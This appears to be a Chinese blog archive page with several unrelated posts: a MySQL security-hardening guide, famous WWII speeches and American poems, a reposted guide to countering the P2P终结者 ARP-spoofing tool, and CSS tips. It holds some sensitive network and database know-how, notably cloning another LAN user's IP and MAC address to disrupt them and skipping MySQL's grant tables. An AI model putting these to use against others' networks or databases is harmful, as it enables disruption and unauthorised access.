-rw------- 1 mysql mysql 1024 Feb 27 20:08 tables_priv.MYI
-rw------- 1 mysql mysql 8877 Feb 27 20:08 tables_priv.frm
-rw------- 1 mysql mysql 428 Feb 27 20:08 user.MYD
-rw------- 1 mysql mysql 2048 Feb 27 20:08 user.MYI
-rw------- 1 mysql mysql 9148 Feb 27 20:08 user.frm


  如果这些文件的属主及属性不是这样,请用以下两个命令修正之:

shell>chown -R mysql.mysql /usr/local/mysql/var
shell>chmod -R go-rwx /usr/local/mysql/var


  用root用户启动远程服务一直是安全大忌,因为如果服务程序出现问题,远程攻击者极有可能获得主机的完全控制权。MySQL从3.23.15版本开始时作了小小的改动,默认安装后服务要用mysql用户来启动,不允许root用户启动。如果非要用root用户来启动,必须加上--user=root的参数(./safe_mysqld --user=root &)。因为MySQL中有LOAD DATA INFILE和SELECT ... INTO OUTFILE的SQL语句,如果是root用户启动了MySQL服务器,那么,数据库用户就拥有了root用户的写权限。不过MySQL还是做了一些限制的,比如LOAD DATA INFILE只能读全局可读的文件,SELECT ... INTO OUTFILE不能覆盖已经存在的文件。

  本地的日志文件也不能忽视,包括shell的日志和MySQL自己的日志。有些用户在本地登陆或备份数据库的时候为了图方便,有时会在命令行参数里直接带了数据库的密码,如:

shell>/usr/local/mysql/bin/mysqldump -uroot -ptest test>test.sql
shell>/usr/local/mysql/bin/mysql -uroot -ptest


  这些命令会被shell记录在历史文件里,比如bash会写入用户目录的.bash_history文件,如果这些文件不慎被读,那么数据库的密码就会泄漏。用户登陆数据库后执行的SQL命令也会被MySQL记录在用户目录的.mysql_history文件里。如果数据库用户用SQL语句修改了数据库密码,也会因.mysql_history文件而泄漏。所以我们在shell登陆及备份的时候不要在-p后直接加密码,而是在提示后再输入数据库密码。

  另外这两个文件我们也应该不让它记录我们的操作,以防万一。

shell>rm .bash_history .mysql_history
shell>ln -s /dev/null .bash_history
shell>ln -s /dev/null .mysql_history


  上门这两条命令把这两个文件链接到/dev/null,那么我们的操作就不会被记录到这两个文件里了。

3、外部网络安全:

  MySQL数据库安装好以后,Unix平台的user表是这样的:

mysql> use mysql;
Database changed
mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root | | Y | Y |
| redhat | root | | Y | Y |
| localhost | | | N | N |
| redhat | | | N | N |
+-----------+------+----------+-------------+------------+
4 rows in set (0.00 sec)


  Windows平台的user表是这样的:

mysql> use mysql;
Database changed
mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root | | Y | Y |
| % | root | | Y | Y |
| localhost | | | Y | Y |
| % | | | N | N |
+-----------+------+----------+-------------+------------+
4 rows in set (0.00 sec)

  我们先来看Unix平台的user表。其中redhat只是我试验机的机器名,所以实际上Unix平台的MySQL默认只允许本机才能连接数据库。但是缺省root用户口令是空,所以当务之急是给root用户加上口令。给数据库用户加口令有三种方法:

  1)在shell提示符下用mysqladmin命令来改root用户口令: shell>mysqladmin -uroot password test。

  这样,MySQL数据库root用户的口令就被改成test了。(test只是举例,我们实际使用的口令一定不能使用这种易猜的弱口令)

  2)用set password修改口令:mysql> set password for root@localhost=password('test');。

  这时root用户的口令就被改成test了。

  3)直接修改user表的root用户口令:

mysql> use mysql;
mysql> update user set password=password('test') where user='root';
mysql> flush privileges;

  这样,MySQL数据库root用户的口令也被改成test了。其中最后一句命令flush privileges的意思是强制刷新内存授权表,否则用的还是缓冲中的口令,这时非法用户还可以用root用户及空口令登陆,直到重启MySQL服务器。

  我们还看到user为空的匿名用户,虽然它在Unix平台下没什么权限,但为了安全起见我们应该删除它:mysql> delete from user where user=''; 。

  Windows版本MySQL的user表有很大不同,我们看到Host字段除了localhost还有是%。这里%的意思是允许任意的主机连接MySQL服务器,这是非常不安全的,给攻击者造成可乘之机,我们必须删除Host字段为%的记录: mysql>delete from user where host='%'; 。

  默认root用户的空密码也是必须修改,三种修改方法和Unix平台一样。

我们注意到Host字段为localhost的匿名用户拥有所有的权限!就是说本地用户用空的用户名和空的口令登陆MySQL数据库服务器可以得到最高的权限!所以匿名用户必须删除!


mysql> delete from user where user='';


  对user表操作以后不要忘了用flush privileges来强制刷新内存授权表,这样才能生效。


  默认安装的Windows版MySQL存在的不安全因素太多,我们在安装后一定要进一步配置!


  MySQL的5个授权表:user, db, host, tables_priv和columns_priv提供非常灵活的安全机制,从MySQL 3.22.11开始引入了两条语句GRANT和REVOKE来创建和删除用户权限,可以方便的限制哪个用户可以连接服务器,从哪里连接以及连接后可以做什么操作。作为MySQL管理员,我们必须了解授权表的意义以及如何用GRANT和REVOKE来创建用户、授权和撤权、删除用户。

  在3.22.11版本以前的MySQL授权机制不完善,和新版本也有较大的不同,建议升级到最新版本的MySQL。(本书的操作例子是以MySQL 3.23.49为样本)我们先来了解授权表的结构。

  1)MySQL授权表的结构与内容:

mysql> desc user;
+-----------------+-----------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host | char(60) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Password | char(16) binary | | | | |
| Select_priv | enum('N','Y') | | | N | |
| Insert_priv | enum('N','Y') | | | N | |
| Update_priv | enum('N','Y') | | | N | |
| Delete_priv | enum('N','Y') | | | N | |
| Create_priv | enum('N','Y') | | | N | |
| Drop_priv | enum('N','Y') | | | N | |
| Reload_priv | enum('N','Y') | | | N | |
| Shutdown_priv | enum('N','Y') | | | N | |
| Process_priv | enum('N','Y') | | | N | |
| File_priv | enum('N','Y') | | | N | |
| Grant_priv | enum('N','Y') | | | N | |
| References_priv | enum('N','Y') | | | N | |
| Index_priv | enum('N','Y') | | | N | |
| Alter_priv | enum('N','Y') | | | N | |
+-----------------+-----------------+------+-----+---------+-------+
17 rows in set (0.01 sec)

  user表是5个授权表中最重要的一个,列出可以连接服务器的用户及其加密口令,并且它指定他们有哪种全局(超级用户)权限。在user表启用的任何权限均是全局权限,并适用于所有数据库。所以我们不能给任何用户访问mysql.user表的权限!

权限说明:

+-----------+-------------+-------------------+
| 权限指定符| 列名 |权限操作 |
+-----------+-------------+-------------------------------+
| Select | Select_priv | 允许对表的访问,
不对数据表进行访问的select语句不受影响,比如select 1+1|
+-----------+-------------+-------------------------------+
| Insert | Insert_priv | 允许对表用insert语句进行写入操作。 |
+-----------+-------------+-------------------------------+
| Update | Update_priv | 允许用update语句修改表中现有记录。 |
+-----------+-------------+-------------------------------+
| Delete | Delete_priv | 允许用delete语句删除表中现有记录。 |
+-----------+-------------+-------------------------------+
| Create | Create_priv | 允许建立新的数据库和表。 |
+-----------+-------------+-------------------------------+
| Drop | Drop_priv | 允许删除现有的数据库和表。 |
+-----------+-------------+-------------------------------+
| Index | Index_priv | 允许创建、修改或删除索引。 |
+-----------+-------------+-------------------------------+
| Alter | Alter_priv | 允许用alter语句修改表结构。 |
+-----------+-------------+-------------------------------+
| Grant | Grant_priv | 允许将自己拥有的权限授予其它用户,包括grant。 |
+-----------+-------------+-------------------------------+
| Reload | Reload | 允许重载授权表,刷新服务器等命令。 |
+-----------+-------------+-------------------------------+
| Shutdown | Shudown_priv| 允许用mysqladmin
shutdown命令关闭MySQL服务器。该权限比较危险, |
| | | 不应该随便授予。 |
+-----------+-------------+-------------------------------+
| Process | Process_priv| 允许查看和终止
MySQL服务器正在运行的线程(进程)以及正在执行的查询语句 |
| | | ,包括执行修改密码的查询语句。该权限比较危险,不应该随便授予。 |
+-----------+-------------+-------------------------------+
| File | File_priv | 允许从服务器上读全局可读文件和写文件。
该权限比较危险,不应该随便授予。|
+-----------+-------------+-------------------------------+

mysql> desc db;
+-----------------+-----------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Select_priv | enum('N','Y') | | | N | |
| Insert_priv | enum('N','Y') | | | N | |
| Update_priv | enum('N','Y') | | | N | |
| Delete_priv | enum('N','Y') | | | N | |
| Create_priv | enum('N','Y') | | | N | |
| Drop_priv | enum('N','Y') | | | N | |
| Grant_priv | enum('N','Y') | | | N | |
| References_priv | enum('N','Y') | | | N | |
| Index_priv | enum('N','Y') | | | N | |
| Alter_priv | enum('N','Y') | | | N | |
+-----------------+-----------------+------+-----+---------+-------+
13 rows in set (0.01 sec)

  db表列出数据库,而用户有权限访问它们。在这里指定的权限适用于一个数据库中的所有表。

mysql> desc host;
+-----------------+-----------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| Select_priv | enum('N','Y') | | | N | |
| Insert_priv | enum('N','Y') | | | N | |
| Update_priv | enum('N','Y') | | | N | |
| Delete_priv | enum('N','Y') | | | N | |
| Create_priv | enum('N','Y') | | | N | |
| Drop_priv | enum('N','Y') | | | N | |
| Grant_priv | enum('N','Y') | | | N | |
| References_priv | enum('N','Y') | | | N | |
| Index_priv | enum('N','Y') | | | N | |
| Alter_priv | enum('N','Y') | | | N | |
+-----------------+-----------------+------+-----+---------+-------+
  host表与db表结合使用在一个较好层次上控制特定主机对数据库的访问权限,这可能比单独使用db好些。这个表不受GRANT和REVOKE语句的影响,所以,你可能发觉你根本不是用它。

mysql> desc tables_priv;
+-------------+-----------------------------+----+
| Field | Type | Null | Key | Default | Extra |
+-------------+-----------------------------+----+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Table_name | char(60) binary | | PRI | | |
| Grantor | char(77) | | MUL | | |
| Timestamp | timestamp(14) | YES | | NULL | |
| Table_priv | set('Select','Insert', | | | | |
| | 'Update','Delete','Create', | | | | |
| | 'Drop','Grant','References',| | | | |
| | 'Index','Alter') | | | | |
| Column_priv | set('Select','Insert', | | | | |
| | 'Update','References') | | | | |
+-------------+-----------------------------+----+
8 rows in set (0.01 sec)

  tables_priv表指定表级权限。在这里指定的一个权限适用于一个表的所有列。

mysql> desc columns_priv;
+-------------+------------------------+------+---+
| Field | Type | Null | Key | Default | Extra |
+-------------+------------------------+------+---+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Table_name | char(64) binary | | PRI | | |
| Column_name | char(64) binary | | PRI | | |
| Timestamp | timestamp(14) | YES | | NULL | |
| Column_priv | set('Select','Insert', | | | | |
| | 'Update','References') | | | | |
+-------------+------------------------+------+---+
7 rows in set (0.00 sec)

  columns_priv表指定列级权限。在这里指定的权限适用于一个表的特定列。

  2)MySQL授权表运行机制:

  MySQL的访问控制分两个步骤:

  a)服务器检查是否允许该用户连接。

  b)如果该用户有权连接,那么服务器还会检查它的每一个请求是否有足够的权限。比如:用户检索数据库中的一个表需要有这个数据库的select权限,用户删除数据库中的一个表需要有这个数据库的drop权限。

  授权表的user, db, host表使用这两个步骤,tables_priv和columns_priv表只使用第二步(检查请求)。每个授权表包含决定一个权限何时运用的范围列和决定授予哪种权限的权限列。

  范围列指定表中的权限何时运用。每个授权表条目包含User和Host列来指定权限何时运用于一个给定用户从给定主机的连接。其他表包含附加的范围列,如db表包含一个Db列指出权限运用于哪个数据库。类似地,tables_priv和columns_priv表包含范围字段,缩小范围到一个数据库中的特定表或一个表的特定列。

下面是user表的Host字段和User字段组合的一些例子:

+-----------------------------+--------+--------------+
| Host值 | User值 | 匹配的连接 |
+-----------------------------+--------+--------------+
| 'x.y.z' | 'test' | test用户只能从x.y.z连接数据库 |
+-----------------------------+--------+--------------+
| 'x.y.z' | '' | 任何用户可以从x.y.z连接数据库 |
+-----------------------------+--------+--------------+
| '%' | 'test' | test用户可以从任意主机连接数据库 |
+-----------------------------+--------+--------------+
| '' | '' | 任何用户可以从任意主机连接数据库 |
+-----------------------------+--------+--------------+
| '%.y.z' | 'test' | test用户可以从y.z域的任意主机连接数据库 |
+-----------------------------+--------+--------------+
| 'x.y.% ' | 'test' | test用户可以从x.y.net,
x.y.com, x.y.edu等主机连接数据库|
+-----------------------------+--------+--------------+
| '192.168.1.1' | 'test' | test用户可以从IP地址为
192.168.1.1的主机连接数据库 |
+-----------------------------+--------+--------------+
| '192.168.1.% ' | 'test' | test用户可以从C类子网
192.168.1中的任意主机连接数据库 |
+-----------------------------+--------+--------------+
| '192.168.1.0/255.255.255.0' | 'test' | 同上 |
+-----------------------------+--------+--------------+

  SQL的字符串通配符%表示匹配任意字符,可以是0个字符,通配符_表示匹配一个字符。

  权限列指出在范围列中指定的用户拥有何种权限。该表使用GRANT语句的权限名称。对于绝大多数在user、db和host表中的权限列的名称与GRANT语句中有明显的联系。如Select_priv对应于SELECT权限。

  3)授权表使用举例:

  grant用于给增加用户和创建权限,revoke用于删除用户权限。

  下面是一些用grant增加用户和创建权限的例子:

mysql> grant all privileges on *.* to
test@localhost identified by 'test' with grant option;

  这句增加一个本地具有所有权限的test用户(超级用户),密码是test。ON子句中的*.*意味着"所有数据库、所有表"。with grant option表示它具有grant权限。

mysql> grant select,insert,update,delete,create,drop
privileges on test.* to test1@'192.168.1.0/255.255.255.0' identified by 'test';

  这句是增加了一个test1用户,口令是test,但是它只能从C类子网192.168.1连接,对test库有select,insert,update,delete,create,drop操作权限。

  用grant语句创建权限是不需要再手工刷新授权表的,因为它已经自动刷新了。

  给用户创建权限还可以通过直接修改授权表:

mysql> insert into user values("localhost","test",password("test"),"Y","Y","Y","Y","Y","Y",
"Y","Y","Y","Y","Y","Y","Y","Y");
mysql> flush privileges;

  这两句和上面第一句grant的效果是一样的,也是增加了一个本地的test超级用户。我们看到用grant方便多了,而且还不需flush privileges:

mysql> insert into user (host,user,password) values
("192.168.1.0/255.255.255.0","test1",PASSWORD("test"));
mysql> insert into db values("192.168.1.0/255.255.255.0",
"test","test1","Y","Y","Y","Y","Y","Y","N","N","N","N")
mysql> flush privileges;

  这三句和上面第二句grant的效果也是一样的,也是增加了一个只能从C类子网192.168.1连接,对test库有select,insert,update,delete,create,drop操作权限的test1用户,口令是test。要取消一个用户的权限,使用revoke语句。revoke的语法非常类似于grant语句,除了to用from取代并且没有identified by和with grant option子句,下面是用revoke删除用户权限的例子:

mysql> revoke all on test.* from test1@'192.168.1.0/255.255.255.0';

  这句revoke就撤消了上面第二句grant创建的权限,但是test1用户并没有被删除,必须手工从user表删除:

mysql> delete from user where user='test1';
mysql> flush privileges;


  这样,test1用户就彻底删除了。


  这些只是MySQL授权表的简单使用,更多详细的资料请见MySQL提供的手册。

3、编程需要注意的一些问题:

  不管是用哪种程序语言写连接MySQL数据库的程序,有一条准则是永远不要相信用户提交的数据!

  对于数字字段,我们要使用查询语句:SELECT * FROM table WHERE ID='234',不要使用SELECT * FROM table WHERE ID=234这样的查询语句。MySQL会自动把字串转换为数字字符并且去除非数字字符。如果用户提交的数据经过了mysql_escape_string处理,这样我们就可以完全杜绝了SQL inject攻击。

各种编程语言该注意的问题:

  1)所有Web程序:

    a)尝试在Web表单输入单引号和双引号来测试可能出现的错误,并找出原因所在。

    b)修改URL参数带的%22 ('"'), %23 ('#'), 和 %27 (''')。

    c)对于数字字段的变量,我们的应用程序必须进行严格的检查,否则是非常危险的。

    d)检查用户提交的数据是否超过字段的长度。

    e)不要给自己程序连接数据库的用户过多的访问权限。

  2)PHP:

    a)检查用户提交的数据在查询之前是否经过addslashes处理,在PHP 4.0.3以后提供了基于MySQL C API的函数mysql_escape_string()。

  3)MySQL C API:

    a)检查查询字串是否用了mysql_escape_string() API调用。

  4)MySQL++:

    a)检查查询字串是否用了escape和quote处理。

  5)Perl DBI:

    a)检查查询字串是否用了quote()方法。

  6)Java JDBC:

    a)检查查询字串是否用了PreparedStatement对象。

4、一些小窍门

  1)如果不慎忘记了MySQL的root密码,我们可以在启动MySQL服务器时加上参数--skip-grant-tables来跳过授权表的验证 (./safe_mysqld --skip-grant-tables &),这样我们就可以直接登陆MySQL服务器,然后再修改root用户的口令,重启MySQL就可以用新口令登陆了。


  2)启动MySQL服务器时加上--skip-show-database使一般数据库用户不能浏览其它数据库。

  3)启动MySQL服务器时加上--chroot=path参数,让mysqld守护进程运行在chroot环境中。这样SQL语句LOAD DATA INFILE和SELECT ... INTO OUTFILE就限定在chroot_path下读写文件了。这里有一点要注意,MySQL启动后会建立一个mysql.sock文件,默认是在/tmp目录下。使用了chroot后,MySQL会在chroot_path/tmp去建立mysql.sock文件,如果没有chroot_path/tmp目录或启动MySQL的用户没有这个目录写权限就不能建立mysql.sock文件,MySQL会启动失败。比如我们加了--chroot=/usr/local/mysql/启动参数,那么最好建立一个启动MySQL的用户能写的

/usr/local/mysql/tmp目录,当然我们也可以用--socket=path来指定mysql.sock文件的路径,但这个path一定要在chroot_path里面。

  4)启动MySQL服务器时加上--log-slow-queries[=file]参数,这样mysqld会把SQL命令执行时间超过long_query_time的写入file文件。如果没有指定=file,mysqld默认会写到数据目录下的hostname-slow.log。如果只指定了filename,没有指定路径,那么mysqld也会把filename写到数据目录下。我们通过这个日志文件可以找出执行时间超长的查询语句,然后尽可能的优化它减轻MySQL服务器的负担。

  5)如果我们只需本机使用MySQL服务,那么我们还可以加上--skip-networking启动参数使MySQL不监听任何TCP/IP连接,增加安全性。(非常推荐)

  6)MySQL的更多mysqld启动选项请见MySQL手册4.16.4 mysqld Command-line Options。

Franklin D. Roosevelt:For a Declaration of War

At 7:53 a.m. on Sunday, December 7, 1941, the first assault wave of Japanese fighter planes attacked the U.S. Naval base at Pearl Harbor, Hawaii, taking the Americans completely by surprise.
The first attack wave targeted airfields and battleships. The second wave targeted other ships and shipyard facilities. The air raid lasted until 9:45 a.m. Eight battleships were damaged, with five sunk. Three light cruisers, three destroyers and three smaller vessels were lost along with 188 aircraft. The Japanese lost 27 planes and five midget submarines which attempted to penetrate the inner harbor and launch torpedoes.
Three prime targets; the U.S. Pacific Fleet aircraft carriers, Lexington, Enterprise and Saratoga, were not in the harbor and thus escaped damage.
The casualty list at Pearl Harbor included 2,335 servicemen and 68 civilians killed, and 1,178 wounded. Over a thousand crewmen aboard the USS Arizona battleship were killed after a 1,760 pound aerial bomb penetrated the forward magazine causing catastrophic explosions.
Pearl Harbor Slide Show - 20 photos
News of the "sneak attack" was broadcast to the American public via radio bulletins, with many popular Sunday afternoon entertainment programs being interrupted. The news sent a shockwave across the nation, resulting in a tremendous influx of young volunteers into the U.S. Armed Forces. The attack also united the nation behind President Franklin D. Roosevelt and effectively ended the American isolationist movement.
On Monday, December 8, President Roosevelt appeared before Congress and made this speech asking for a declaration of war against Japan, calling the previous day "...a date which will live in infamy..."
Listen to the entire speech - 7:11
=================================

Mr. Vice President, Mr. Speaker, members of the Senate and the House of Representatives:
Yesterday, December 7, 1941 - a date which will live in infamy - the United States of America was suddenly and deliberately attacked by naval and air forces of the Empire of Japan.

The United States was at peace with that nation, and, at the solicitation of Japan, was still in conversation with its government and its Emperor looking toward the maintenance of peace in the Pacific.

Indeed, one hour after Japanese air squadrons had commenced bombing in the American island of Oahu, the Japanese Ambassador to the United States and his colleague delivered to our Secretary of State a formal reply to a recent American message. And, while this reply stated that it seemed useless to continue the existing diplomatic negotiations, it contained no threat or hint of war or of armed attack.

It will be recorded that the distance of Hawaii from Japan makes it obvious that the attack was deliberately planned many days or even weeks ago. During the intervening time the Japanese Government has deliberately sought to deceive the United States by false statements and expressions of hope for continued peace.

The attack yesterday on the Hawaiian Islands has caused severe damage to American naval and military forces. I regret to tell you that very many American lives have been lost. In addition, American ships have been reported torpedoed on the high seas between San Francisco and Honolulu.

Yesterday the Japanese Government also launched an attack against Malaya.Last night Japanese forces attacked Hong Kong.Last night Japanese forces attacked Guam.Last night Japanese forces attacked the Philippine Islands.Last night the Japanese attacked Wake Island.And this morning the Japanese attacked Midway Island.

Japan has therefore undertaken a surprise offensive extending throughout the Pacific area. The facts of yesterday and today speak for themselves. The people of the United States have already formed their opinions and well understand the implications to the very life and safety of our nation.

As Commander-in-Chief of the Army and Navy I have directed that all measures be taken for our defense, that always will our whole nation remember the character of the onslaught against us.

No matter how long it may take us to overcome this premeditated invasion, the American people, in their righteous might, will win through to absolute victory.

I believe that I interpret the will of the Congress and of the people when I assert that we will not only defend ourselves to the uttermost but will make it very certain that this form of treachery shall never again endanger us.

Hostilities exist. There is no blinking at the fact that our people, our territory and our interests are in grave danger.

With confidence in our armed forces, with the unbounding determination of our people, we will gain the inevitable triumph. So help us God.

I ask that the Congress declare that since the unprovoked and dastardly attack by Japan on Sunday, December 7, 1941, a state of war has existed between the United States and the Japanese Empire.

Franklin D. Roosevelt - December 8, 1941

====================================
Three days later, December 11, Japan's allies, Germany and Italy, both declared war on the United States. The U.S. Congress responded immediately by declaring war on them. Thus the European and Southeast Asian wars had become a global conflict with the Axis Powers; Japan, Germany, Italy and others, aligned against the Allied Powers; America, Britain, the Soviet Union and others.

We shall fight them on the beaches

Winston Churchill

"I have, myself, full confidence that if all do their duty, if nothing is neglected, and if the best arrangements are made, as they are being made, we shall prove ourselves once again able to defend our Island home, to ride out the storm of war, and to outlive the menace of tyranny, if necessary for years, if necessary alone.

At any rate, that is what we are going to try to do. That is the resolve of His Majesty's Government-every man of them. That is the will of Parliament and the nation.

The British Empire and the French Republic, linked together in their cause and in their need, will defend to the death their native soil, aiding each other like good comrades to the utmost of their strength.
Even though large tracts of Europe and many old and famous States have fallen or may fall into the grip of the Gestapo and all the odious apparatus of Nazi rule, we shall not flag or fail.

We shall go on to the end, we shall fight in France, we shall fight on the seas and oceans, we shall fight with growing confidence and growing strength in the air, we shall defend our Island, whatever the cost may be, we shall fight on the beaches, we shall fight on the landing grounds, we shall fight in the fields and in the streets, we shall fight in the hills; we shall never surrender, and even if, which I do not for a moment believe, this Island or a large part of it were subjugated and starving, then our Empire beyond the seas, armed and guarded by the British Fleet, would carry on the struggle, until, in God's good time, the New World, with all its power and might, steps forth to the rescue and the liberation of the old."

The Star Spangled Banner

By Francis Scott Key

Oh, say can you see by the dawn's early light
What so proudly we hailed at the twilight's last gleaming?
Whose broad stripes and bright stars thru the perilous fight,
O'er the ramparts we watched were so gallantly streaming?
And the rocket's red glare, the bombs bursting in air,
Gave proof through the night that our flag was still there.
Oh, say does that star-spangled banner yet wave
O'er the land of the free and the home of the brave?

On the shore, dimly seen through the mists of the deep,
Where the foe's haughty host in dread silence reposes,
What is that which the breeze, o'er the towering steep,
As it fitfully blows, half conceals, half discloses?
Now it catches the gleam of the morning's first beam,
In full glory reflected now shines in the stream:
'Tis the star-spangled banner! Oh long may it wave
O'er the land of the free and the home of the brave!


And where is that band who so vauntingly swore
That the havoc of war and the battle's confusion,
A home and a country should leave us no more!
Their blood has washed out their foul footsteps' pollution.
No refuge could save the hireling and slave
From the terror of flight, or the gloom of the grave:
And the star-spangled banner in triumph doth wave
O'er the land of the free and the home of the brave!


Oh! thus be it ever, when freemen shall stand
Between their loved home and the war's desolation!
Blest with victory and peace, may the heav'n rescued land
Praise the Power that hath made and preserved us a nation.
Then conquer we must, when our cause it is just,
And this be our motto: "In God is our trust."
And the star-spangled banner in triumph shall wave
O'er the land of the free and the home of the brave!

2007年5月21日星期一

The New Colossus

A poem by Emma Lazarus is graven on a tablet within the pedestal on which the statue stands
===========================


Not like the brazen giant of Greek fame,

With conquering limbs astride from land to land;

Here at our sea-washed, sunset gates shall stand

A mighty woman with a torch, whose flame

Is the imprisoned lightning, and her name

Mother of Exiles. From her beacon-hand

Glows world-wide welcome; her mild eyes command

The air-bridged harbor that twin cities frame.

"Keep ancient lands, your storied pomp!" cries she

With silent lips. "Give me your tired, your poor,

Your huddled masses yearning to breathe free,

The wretched refuse of your teeming shore.

Send these, the homeless, tempest-tost to me,

I lift my lamp beside the golden door!"

2007年5月19日星期六

[转载]怎样破解P2P终结者

P2P终结者使用了ARP嗅探和ARP欺骗方法,所以破解P2P终结者的基本方法就是用ARP攻击的方法,归纳起来有以下方法:

1. 使用VLAN
只要你的PC和P2P终结者软件不在同一个VLAN里,他就拿你没办法。

2. 使用双向IP/MAC绑定
在PC上绑定你的出口路由器的MAC地址,P2P终结者软件不能对你进行ARP欺骗,自然也没法管你,不过只是PC绑路由的MAC还不安全,因为P2P终结者软件可以欺骗路由,所以最好的解决办法是使用PC,路由上双向IP/MAC绑定,就是说,在PC上绑定出路路由的MAC地址,在路由上绑定PC的IP和MAC地址,这样要求路由要支持IP/MAC绑定,比如HIPER路由器。

3. 使用IP/MAC地址盗用+IP/MAC绑定
索性你把自己的MAC地址和IP地址改成和运行P2P终结者软件者一样的IP和MAC, 看他如何管理, 这是一个两败俱伤的办法,改动中要有一些小技巧,否则会报IP冲突。要先改MAC地址,再改IP,这样一来WINDOWS就不报IP冲突了(windows傻吧),做到这一步还没有完,最好你在PC上吧路由的MAC地址也绑定,这样一来P2P终结者欺骗路由也白费力气了。

xp系统:只要用arp命令绑定自己MAC和路由MAC就行了,
如:arp 自己IP 自己MAC
arp 路由IP路由MAC
最好都绑定一下,我试过,只绑定路由的话,出了IP冲突就上不去了,别人照样能T你下线.如果绑定了自己的话,IP冲突了也能上网
9x/2000就需要软件了
下载(anti arp sniffer)就行了

防ARP工具集合
下载地址为:
http://www.sbei.org/best/showdown.asp?soft_id="106"

设置好路由IP,mac
不过我是xp系统也安装了这个软件,可以清楚的看到谁想T你下线或者想限制你
建议更换xp
只要上面设置一下,p2p终结者就报废了,

xp系统在cmd状态输入: arp -a
如果路由IP 还有自己IP最后面状态是static,那么就表示绑定成功
arp -d
绑定之前也最好输入一下,删除非法绑定

或者你在网上下载一个网络执法官在局域网的任何一台机子使用就行了。这个软件就不用说了吧,很好的网管软件。

2007年5月17日星期四

[转载]CSS知识补遗

1. Block和inline元素对比

  所有的HTML元素都属于block和inline之一。
  block元素的特点是:
  总是在新行上开始;
  高度,行高以及顶和底边距都可控制;
  宽度缺省是它的容器的100%,除非设定一个宽度
div, p, h1, form, ul和li是块元素的例子。
  相反地,inline元素的特点是:
  和其他元素都在一行上;
  高,行高及顶和底边距不可改变;
  宽度就是它的文字或图片的宽度,不可改变。
  span, a, label, input, img, strong 和em是inline元素的例子。
  用display: inline 或display: block命令就可以改变一个元素的这一特性。什么时候需要改变这一属性呢?
  让一个inline元素从新行开始;
  让块元素和其他元素保持在一行上;
  控制inline元素的宽度(对导航条特别有用);
  控制inline元素的高度;
  无须设定宽度即可为一个块元素设定与文字同宽的背景色。

2. 再来一个box黑客方法

  之所以有这么多box黑客方法,是因为IE在6之前对box的理解跟别人都不一样,它的宽度要包含边线宽和空白。要想让IE5等同其他浏览器保持一致,可以用CSS的方法:
  padding: 2em;
  border: 1em solid green;
  width: 20em;
  width/**/:/**/ 14em;
  第一个宽度所有浏览器都认得,但IE5.x不认得第2行的宽度设置,只因为那一行上有空白的注释符号(多么蠢的语法分析!),所以IE5.x就用20减掉一些空白,而其他浏览器会用14这个宽度,因为它是第2行,会覆盖掉第1行。

3. 页面的最小宽度

  min-width是个非常方便的CSS命令,它可以指定元素最小也不能小于某个宽度,这样就能保证排版一直正确。但IE不认得这个,而它实际上把width当做最小宽度来使。为了让这一命令在IE上也能用,可以把一个放到 标签下,然后为div指定一个类:
  <body>
  <div class="container">
  然后CSS这样设计:
  #container
  {
  min-width: 600px;
  width:expression(document.body.clientWidth <> 1200? ”1200px“ : ”auto";
  }

4. IE与宽度和高度的问题

  IE不认得min-这个定义,但实际上它把正常的width和height当作有min的情况来使。这样问题就大了,如果只用宽度和高度,正常的浏览器里这两个值就不会变,如果只用min-width和min-height的话,IE下面根本等于没有设置宽度和高度。
  比如要设置背景图片,这个宽度是比较重要的。要解决这个问题,可以这样:
  .box
  {
  width: 80px;
  height: 35px;
  }
  body .box
  {
  width: auto;
  height: auto;
  min-width: 80px;
  min-height: 35px;
  }
  所有的浏览器都可以使用第一个box设置,但IE不认得第2段设置,因为其中用到了子选择器命令。第2个设置更特殊些,所以它会覆盖掉第1个设置。

5. 字体变形命令

  text-transform 命令很有用,它有3个值:text-transform: uppercase, text-transform: lowercase 和 text-transform: capitalize。第1个会把文字变成全大写,第2个变成全小写,第3个变成首字母大写。这对拼音文字非常有用,即使输入时有大小写错误,在网页上也看不到。

6. IE中图片文字消失的问题

  有时会遇到文字或背景图突然消失的问题,刷新一下又出现了,这在靠近漂浮元素时更容易发生(注:没见过)。此时,可以为消失的元素设定:position: relative ,如果不行,再考虑为这些元素指定一个宽度试试。

7. 不可见文字

  不论因为何种原因希望某些网页文字不在浏览器中显示,比如为了打印或为了小屏幕而让某些文字不显示,都可以用 display: none 。这非常简单,但有时对某些人这有点没用,他们能去掉这个控制,这时就要用到: position: absolute; left: -9000px 。
这实际上是把文字指定在页面以外显示。

8. 为手持设备设计专门的CSS

  也就是手机/PDA等小屏幕用户,可以专门设计一个CSS来让网页显示更舒服些。为此,可以把浏览器窗口调整到150点宽来看效果。指定专门的手持设备的CSS的语法是:
  <link media="handheld" href="handheldstyle.css" type="text/css" rel="stylesheet">
  也可以阅读专门的手持设备可用性。

9. 3D效果的按钮

  以前要想制作带有3D效果,并且点击下去还会变化的按钮,就得用图片替换的方法,现在CSS就可以了:
  a
  {
  display: block;
  border: 1px solid;
  border-color: #aaa #000 #000 #aaa;
  width: 8em;
  background: #fc0;
  }
  a:hover
  {
  position: relative;
  top: 1px;
  left: 1px;
  border-color: #000 #aaa #aaa #000;
  }
  至于效果,还可以自己调整了。

10. 在不同页面上使用同样的导航代码

